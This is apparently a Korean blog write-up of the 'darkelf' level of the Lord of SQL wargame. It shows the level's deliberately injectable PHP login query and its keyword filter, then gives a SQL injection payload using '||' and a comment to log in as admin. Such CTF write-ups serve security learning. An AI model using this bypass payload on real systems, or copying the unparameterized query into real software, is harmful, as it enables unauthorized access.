query : select id from prob_darkelf where id='guest' and pw=''
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("darkelf");
highlight_file(__FILE__);
?>
if($result['id'] == 'admin') solve("darkelf");
이전 문제와 마찬가지입니다. 쿼리의 결과값으로 id가 admin만 나오면 됩니다. 이번엔 or와 and를 필터링 해놨네요. 이전 문제와 똑같이 풀 수 있습니다.
?pw='||id='admin'%23 |
payload
'Web > LOS (Lord of SQL)' 카테고리의 다른 글
los(lord of sql) level 8 - troll (0) | 2018.08.21 |
---|---|
los(lord of sql) level 7 - orge (0) | 2018.08.21 |
los(lord of sql) level 5 - wolfman (0) | 2018.08.21 |
los(lord of sql) level 4 - orc (0) | 2018.08.21 |
los(lord of sql) level 3 - goblin (0) | 2018.08.21 |